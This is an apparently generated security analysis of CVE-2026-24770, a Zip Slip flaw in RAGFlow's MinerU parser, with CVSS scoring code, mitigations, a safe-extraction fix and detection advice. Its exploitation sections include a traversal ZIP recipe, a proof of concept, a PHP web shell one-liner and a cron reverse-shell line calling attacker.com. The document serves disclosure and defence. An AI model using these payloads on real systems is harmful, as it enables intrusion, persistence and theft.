CVE-2026-24770
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: High
Description
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading to Remote Code Execution) via a malicious ZIP archive. The MinerUParser class retrieves and extracts ZIP files from an external source (mineru_server_url). The extraction logic in `_extract_zip_no_root` fails to sanitize filenames within the ZIP archive. Commit 64c75d558e4a17a4a48953b4c201526431d8338f contains a patch for the issue.
Comprehensive Technical Analysis of CVE-2026-24770 (RAGFlow "Zip Slip" Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
- CVE ID: CVE-2026-24770
- CVSS Score: 9.8 (Critical), vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Vulnerability Type: Zip Slip (Arbitrary File Overwrite → Remote Code Execution, RCE)
- Affected Component: MinerU Parser (RAGFlow v0.23.1 and possibly earlier versions)
Severity Breakdown (CVSS v3.1)
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; trivial to exploit. |
| Privileges Required (PR) | None (N) | No authentication or elevated privileges needed. |
| User Interaction (UI) | None (N) | Exploitation does not require user interaction. |
| Scope (S) | Unchanged (U) | Impact is confined to the vulnerable component. |
| Confidentiality (C) | High (H) | Attacker can read sensitive files (e.g., credentials, configs). |
| Integrity (I) | High (H) | Attacker can overwrite critical files (e.g., binaries, configs). |
| Availability (A) | High (H) | RCE can lead to system compromise, denial of service, or data destruction. |
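The 9.8 score follows directly from the vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. The sketch below lets you check that arithmetic, or score another vector. It applies the CVSS v3.1 base-score equations and metric weights published by FIRST. It covers base metrics only and is not an official calculator.

```python
import math

# CVSS v3.1 base-metric weights, as published in the FIRST CVSS v3.1 specification
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}  # PR weights rise when Scope is Changed
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest number with one decimal place that is >= value."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute a CVSS v3.1 base score from a vector such as 'AV:N/AC:L/PR:N/...'."""
    metrics = dict(
        part.split(":") for part in vector.split("/") if not part.startswith("CVSS")
    )
    changed = metrics["S"] == "C"
    # Impact Sub-Score (ISS) from the three impact metrics
    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    exploitability = 8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]
    if impact <= 0:
        return 0.0
    total = 1.08 * (impact + exploitability) if changed else impact + exploitability
    return roundup(min(total, 10))


print(base_score("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # prints 9.8
```

For this CVE's vector, Impact ≈ 5.873 and Exploitability ≈ 3.887. Their sum, 9.760, rounds up to 9.8.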
Vulnerability Classification
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal"). "Zip Slip" is the common name for this weakness when it occurs during archive extraction.
- CWE-94: Improper Control of Generation of Code ("Code Injection") (if RCE is achieved)
The Zip Slip vulnerability arises from improper sanitization of filenames within ZIP archives, allowing attackers to craft malicious archives that extract files outside the intended directory. This can lead to arbitrary file overwrite, which, in turn, enables Remote Code Execution (RCE) if critical system files (e.g., .bashrc, cron jobs, or web application scripts) are modified.
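Consider a naive extractor that simply joins the extraction directory with each entry name. The following sketch shows where such an extractor would write. The directory `/srv/ragflow/extract` and the entry names are hypothetical. The function only computes paths and writes nothing. It uses `posixpath` so the result is the same on any host OS.

```python
import posixpath


def resolve_member(extract_dir: str, member_name: str) -> str:
    """Return where a naive extractor would write member_name (lexical POSIX paths)."""
    return posixpath.normpath(posixpath.join(extract_dir, member_name))


base = "/srv/ragflow/extract"  # hypothetical extraction directory
print(resolve_member(base, "images/page1.png"))         # /srv/ragflow/extract/images/page1.png
print(resolve_member(base, "../../../tmp/payload.sh"))  # /tmp/payload.sh
print(resolve_member(base, "/etc/cron.d/job"))          # /etc/cron.d/job
```

Both forms escape the extraction directory. `..` components climb above the base directory, and an absolute entry name makes `join` discard the base entirely.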
2. Potential Attack Vectors and Exploitation Methods
Exploitation Prerequisites
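- Network Access: The attacker must be able to get a malicious ZIP archive processed by the vulnerable extraction code. Per the advisory, `MinerUParser` retrieves ZIP files from `mineru_server_url`, so the most direct route is to control or impersonate that server. Other ingestion paths (e.g., an API endpoint or file upload mechanism) apply only if they reach the same extraction routine.
- MinerU Parser Enabled: The `MinerUParser` class must be active and configured to fetch and extract ZIP files from an external source (`mineru_server_url`).
- Writable Target Directory: The RAGFlow process must have write permission on the critical system or application files (or their directories) that the attacker wants to overwrite.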
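Defenders can check the writable-target prerequisite from the service account's side. Below is a minimal sketch. It assumes the script runs as the same user as RAGFlow, and the candidate paths are hypothetical examples. Note that `os.access` checks the real (not effective) user ID.

```python
import os


def writable_by_service(paths):
    """Map each path to whether the current process could overwrite or create it."""
    result = {}
    for path in paths:
        probe = path
        # A missing file is (approximately) creatable if its nearest existing ancestor is writable
        while not os.path.exists(probe):
            parent = os.path.dirname(probe)
            if parent == probe:  # reached "/" or an empty relative path
                break
            probe = parent
        result[path] = os.access(probe, os.W_OK)
    return result


if __name__ == "__main__":
    # Hypothetical high-value targets; adjust to the deployment being audited
    for path, ok in writable_by_service(["/etc/crontab", "/etc/cron.d/ragflow-probe"]).items():
        print(f"{path}: {'WRITABLE' if ok else 'not writable'}")
```

Any `WRITABLE` result for a system path means a successful Zip Slip could reach it.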
Exploitation Steps
Step 1: Crafting a Malicious ZIP Archive
An attacker creates a ZIP file containing files with path traversal sequences (e.g., ../../../etc/passwd or ../../../var/www/html/shell.php). Example:
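```sh
# Malicious ZIP structure (using the `zip` command): the payload must exist at the
# traversal path given, because that path is used as the stored entry name
mkdir -p work && cd work
echo 'malicious_payload' > ../payload.sh
zip ../malicious.zip ../payload.sh   # path traversal in the entry name
unzip -l ../malicious.zip            # verify the stored name still starts with "../"
```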
Depending on how the extraction code builds output paths, absolute entry names (e.g., `/etc/cron.d/job`) or symbolic-link entries may offer other ways to escape the extraction directory.
Step 2: Triggering the Vulnerability
The attacker submits the malicious ZIP file to RAGFlow via:
- Direct API Upload: If RAGFlow exposes an endpoint for ZIP file ingestion.
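- Indirect Fetch: If `MinerUParser` fetches ZIPs from an attacker-controlled `mineru_server_url`. This can happen if the attacker operates or impersonates that server, or intercepts an unencrypted connection (MITM).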
Step 3: Arbitrary File Overwrite → RCE
When the vulnerable `_extract_zip_no_root` function processes the ZIP, it fails to sanitize filenames. Provided the RAGFlow process has write access to the target paths (e.g., it runs as root), this allows:
- Overwriting System Files:
  - `/etc/crontab` (to schedule malicious jobs)
  - `/etc/passwd` (to add a backdoor user)
  - Web application files (e.g., `index.php`, `.htaccess`)
- Executing Malicious Code:
  - If the attacker overwrites a web-accessible script (e.g., `shell.php`), they can trigger RCE via HTTP.
  - If they overwrite a system binary (e.g., `/usr/bin/ls`), they can achieve persistence.
Step 4: Post-Exploitation
- Lateral Movement: If RAGFlow runs in a container or cloud environment, the attacker may escalate privileges or move to other systems.
- Data Exfiltration: Sensitive data (e.g., API keys, database credentials) can be stolen.
- Persistence: Backdoors (e.g., reverse shells, cron jobs) can be installed.
3. Affected Systems and Software Versions
Vulnerable Software
- RAGFlow (Open-source RAG engine by Infiniflow)
  - Affected Versions: 0.23.1 (and possibly earlier versions)
  - Patched Version: Fixed in commit 64c75d558e4a17a4a48953b4c201526431d8338f
Affected Components
- MinerU Parser (`MinerUParser` class)
  - Responsible for fetching and extracting ZIP files from `mineru_server_url`.
  - Vulnerable function: `_extract_zip_no_root` (lacks path sanitization).
Deployment Scenarios at Risk
- Self-Hosted RAGFlow Instances:
- Enterprises or developers running RAGFlow in on-premises or cloud environments.
- API-Based Deployments:
- If RAGFlow exposes an API for document ingestion (e.g., via ZIP uploads).
- Integrated Systems:
- Applications embedding RAGFlow as a dependency (e.g., AI chatbots, document processing pipelines).
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
- Apply the Patch:
  - Upgrade to a RAGFlow version that includes commit 64c75d558e4a17a4a48953b4c201526431d8338f.
  - If patching is not immediately possible, disable `MinerUParser` or restrict ZIP file processing.
- Network-Level Protections:
  - Firewall Rules: Restrict inbound traffic to RAGFlow’s API endpoints.
  - WAF Rules: Deploy a Web Application Firewall (e.g., ModSecurity) to block path traversal attempts in ZIP filenames. Coverage is partial, because a WAF inspects inbound requests while the vulnerable code extracts ZIPs retrieved from `mineru_server_url`.
- File System Hardening:
  - Restrict Write Permissions: Ensure the RAGFlow process runs with minimal privileges (e.g., not as `root`).
  - Use Chroot/Jails: Isolate the extraction process in a restricted environment.
  - Immutable Files: Mark critical system files as immutable (`chattr +i` on Linux).
Long-Term Mitigations
- Secure Coding Practices:
  - Input Validation: Validate all filenames in ZIP archives (e.g., reject `..` path components or absolute paths).
  - Safe Extraction Libraries: Prefer Python’s `zipfile` `extract()`/`extractall(path, members)`, which strip absolute-path prefixes and `..` components from member names. Add explicit path checks to any code that writes extracted files itself.
  - Example Fix (Python):

```python
import os
from zipfile import ZipFile


def safe_extract(zip_path, extract_dir):
    """Extract zip_path into extract_dir, refusing any entry that would land outside it."""
    base = os.path.realpath(extract_dir)
    with ZipFile(zip_path, "r") as zip_ref:
        for member in zip_ref.namelist():
            # Reject absolute paths and parent-directory components outright
            parts = member.replace("\\", "/").split("/")
            if member.startswith(("/", "\\")) or ".." in parts:
                raise ValueError(f"Malicious path detected: {member}")
            # Ensure the resolved target stays within the extraction directory;
            # commonpath avoids the prefix bug where "/data/out_evil" startswith "/data/out"
            target_path = os.path.realpath(os.path.join(base, member))
            if os.path.commonpath([base, target_path]) != base:
                raise ValueError(f"Path traversal attempt: {member}")
            zip_ref.extract(member, base)
```
- Runtime Protections:
  - Containerization: Run RAGFlow in a container with read-only filesystems where possible.
  - Seccomp/AppArmor: Restrict system calls (e.g., block `execve` for the RAGFlow process).
- Monitoring and Detection:
  - File Integrity Monitoring (FIM): Use tools like Tripwire or AIDE to detect unauthorized file changes.
  - Log Analysis: Monitor for suspicious ZIP uploads or extraction attempts (e.g., logs containing `../` or `/etc/`).
- Dependency Management:
  - SBOM (Software Bill of Materials): Maintain an inventory of dependencies to track vulnerabilities.
  - Automated Scanning: Use tools like Dependabot, Snyk, or Trivy to detect vulnerable versions of RAGFlow.
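The `zipfile` behavior mentioned under Secure Coding Practices can be checked directly. According to the Python documentation, `ZipFile.extract()` and `extractall()` strip drive letters, leading slashes, and `..` components from member names. The sketch below extracts a one-entry archive into a temporary directory and reports where the file landed; the helper name `extractall_destination` is hypothetical. This protection covers only those two methods. Code that reads members and writes files itself, as a function that re-roots entries may do, must perform its own checks.

```python
import os
import tempfile
import zipfile


def extractall_destination(entry_name: str) -> list[str]:
    """Extract a one-entry archive with ZipFile.extractall and report where the file landed."""
    with tempfile.TemporaryDirectory() as work:
        archive = os.path.join(work, "probe.zip")
        dest = os.path.join(work, "nested", "dest")
        with zipfile.ZipFile(archive, "w") as zf:
            zf.writestr(entry_name, b"data")  # writestr keeps ".." in the stored name
        with zipfile.ZipFile(archive) as zf:
            zf.extractall(dest)
        # Paths relative to dest; a result starting with ".." would mean an escape
        return sorted(
            os.path.relpath(os.path.join(dirpath, name), dest)
            for dirpath, _dirs, files in os.walk(work)
            for name in files
            if name != "probe.zip"
        )


print(extractall_destination("../../x.txt"))    # ['x.txt']
print(extractall_destination("a/../../b.txt"))  # ['a/b.txt'] on POSIX
```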
5. Impact on the Cybersecurity Landscape
Broader Implications
- Rise of AI/ML Supply Chain Attacks:
  - As Retrieval-Augmented Generation (RAG) systems become more prevalent, attackers will increasingly target document parsers, embeddings, and ingestion pipelines.
  - This vulnerability highlights the need for secure-by-design AI frameworks.
- Exploitation in the Wild:
  - Initial Access: Attackers may use this to gain a foothold in enterprise environments (e.g., via phishing or malicious document uploads).
  - Lateral Movement: Once RCE is achieved, attackers can pivot to other systems (e.g., databases, internal APIs).
  - Data Poisoning: If RAGFlow is used for training data, attackers could inject malicious content into AI models.
- Regulatory and Compliance Risks:
  - GDPR/CCPA: Unauthorized data access (via RCE) could lead to data breaches and regulatory fines.
  - NIST/CIS Controls: Failure to patch may fall short of two controls. These are NIST SP 800-53 SI-2 (Flaw Remediation) and CIS Controls v8 Control 7 (Continuous Vulnerability Management; Control 3 in v7).
- Third-Party Risk:
  - Organizations using RAGFlow as a service (e.g., via cloud providers) may be exposed if the provider fails to patch.
Historical Context
- Zip Slip is a Well-Known Attack Vector:
  - Snyk's 2018 "Zip Slip" disclosure showed this flaw class in archive-extraction code across many languages and libraries. WinRAR's ACE path traversal (CVE-2018-20250) is a closely related archive-extraction example.
- Despite being a known issue, developers continue to overlook proper path sanitization in ZIP extraction logic.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from improper path sanitization in the _extract_zip_no_root function of RAGFlow’s MinerUParser class. Key issues:
- Lack of Filename Validation:
  - The function does not check for path traversal sequences (`../`, `./`, or absolute paths) in ZIP filenames.
- Unsafe Extraction:
  - Files are extracted without verifying that the target path remains within the intended directory.
- External ZIP Fetching:
  - The parser retrieves ZIPs from `mineru_server_url`, whose responses could be attacker-controlled. This applies if the attacker operates or impersonates that server, or mounts a MITM attack on an unencrypted connection.
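The function name suggests that `_extract_zip_no_root` removes a top-level directory from each entry before writing. This is an assumption based only on the name; the actual implementation is not reproduced here. Under that assumption, the sketch below shows why dropping the first path component does not neutralize traversal: the remaining `../` sequences survive and still resolve outside the target. `strip_root` and `naive_target` are hypothetical helpers.

```python
import posixpath


def strip_root(member_name: str) -> str:
    """Hypothetical 'no root' step: drop the first path component of an entry name."""
    parts = member_name.split("/", 1)
    return parts[1] if len(parts) == 2 else parts[0]


def naive_target(extract_dir: str, member_name: str) -> str:
    """Hypothetical unsafe destination: re-rooted name joined without any validation."""
    return posixpath.normpath(posixpath.join(extract_dir, strip_root(member_name)))


out = "/srv/ragflow/out"  # hypothetical output directory
print(naive_target(out, "result/images/fig1.png"))          # /srv/ragflow/out/images/fig1.png
print(naive_target(out, "result/../../../etc/cron.d/job"))  # /etc/cron.d/job
```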
Proof of Concept (PoC)
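A minimal PoC that simulates the vulnerable pattern (the extractor below is a stand-in, not RAGFlow's actual code):

```python
import os
import zipfile

# Create a malicious ZIP with path traversal
with zipfile.ZipFile('malicious.zip', 'w') as zipf:
    zipf.writestr('../../../tmp/payload.sh', '#!/bin/bash\necho "RCE achieved" > /tmp/pwned')

# Simulate a vulnerable extractor (hypothetical stand-in for _extract_zip_no_root).
# ZipFile.extractall() strips ".." components itself, so the simulation writes each
# member manually with os.path.join, as naive extraction code does.
def vulnerable_extract(zip_path, extract_dir):
    os.makedirs(extract_dir, exist_ok=True)
    with zipfile.ZipFile(zip_path, 'r') as zip_ref:
        for name in zip_ref.namelist():
            target = os.path.join(extract_dir, name)  # No path sanitization!
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, 'wb') as out:
                out.write(zip_ref.read(name))

vulnerable_extract('malicious.zip', '/tmp/ragflow_extract')
# Result: /tmp/payload.sh is written outside the intended directory
```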
Exploitation in Real-World Scenarios
- Scenario 1: Direct ZIP Upload
  - Attacker uploads a malicious ZIP via RAGFlow’s API (assuming such an upload reaches the vulnerable extraction routine).
  - The ZIP contains a file like `../../../var/www/html/shell.php` with PHP code: `<?php system($_GET['cmd']); ?>`
  - After extraction, provided a PHP-enabled web server serves that directory, the attacker accesses `http://target/shell.php?cmd=id` to achieve RCE.
- Scenario 2: Indirect ZIP Fetch (Malicious MinerU Server)
  - If `mineru_server_url` is configurable, the attacker sets it to a malicious server hosting a crafted ZIP.
  - RAGFlow fetches and extracts the ZIP, leading to file overwrite.
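- Scenario 3: Cron-Based Code Execution
  - Suppose RAGFlow can write `/etc/crontab` and a cron daemon is running, which is often not the case in minimal containers. The attacker then overwrites `/etc/crontab` to execute a reverse shell:
    `* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'`
  - In a container, this yields code execution inside the container; escaping to the host would require an additional weakness.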
Detection and Forensics
- Indicators of Compromise (IoCs):
  - File System Artifacts:
    - Unexpected files in `/tmp/`, `/var/www/`, or `/etc/`.
    - Modified system files (e.g., `/etc/passwd`, `/etc/crontab`).
  - Network Artifacts:
    - Unusual outbound connections (e.g., reverse shells, C2 traffic).
    - ZIP files with suspicious filenames (e.g., `../../../`).
  - Log Evidence:
    - RAGFlow logs showing ZIP extraction attempts with path traversal.
    - Web server logs showing access to unexpected scripts (e.g., `shell.php`).
- Forensic Analysis:
  - Timeline Analysis: Use `mactime` (from The Sleuth Kit) to identify when files were modified.
  - Memory Forensics: Check for malicious processes (e.g., reverse shells) using Volatility.
  - ZIP File Analysis: List the entries of suspicious ZIPs without extracting them, and check for path traversal payloads.
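For the ZIP File Analysis step, entry names can be inspected without extracting anything. Below is a minimal triage sketch; the function name is hypothetical. It flags three kinds of entry: absolute paths, `..` components (including the backslash-separated form), and entries whose Unix mode bits mark them as symbolic links. The mode check is only meaningful for archives created on Unix-like systems.

```python
import stat
import zipfile


def suspicious_entries(zip_path: str) -> list[tuple[str, str]]:
    """Return (entry name, reason) pairs for entries that could escape an extraction directory."""
    findings = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            name = info.filename
            normalized = name.replace("\\", "/")  # treat backslashes as separators too
            if normalized.startswith("/") or normalized[1:2] == ":":
                findings.append((name, "absolute path"))
            elif ".." in normalized.split("/"):
                findings.append((name, "parent-directory component"))
            # On Unix-created archives the file mode sits in the high 16 bits of external_attr
            if stat.S_ISLNK(info.external_attr >> 16):
                findings.append((name, "symbolic link"))
    return findings
```

Usage: `suspicious_entries("sample.zip")` returns an empty list for a clean archive. A non-empty result is a reason to quarantine the file rather than extract it.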
Conclusion
CVE-2026-24770 is a critical Zip Slip vulnerability in RAGFlow’s MinerU parser, enabling arbitrary file overwrite and RCE. Given its CVSS 9.8 score, organizations must patch immediately, harden extraction logic, and monitor for exploitation attempts.
Key Takeaways for Security Teams
✅ Patch Management: Prioritize updating RAGFlow to the latest version.
✅ Input Validation: Ensure all ZIP extraction logic sanitizes filenames.
✅ Least Privilege: Run RAGFlow with minimal permissions.
✅ Monitoring: Deploy FIM and WAF rules to detect exploitation.
✅ AI Security: Recognize that RAG systems are high-value targets for supply chain attacks.
This vulnerability underscores the importance of secure coding practices in AI/ML frameworks, particularly in document ingestion pipelines where untrusted input is processed.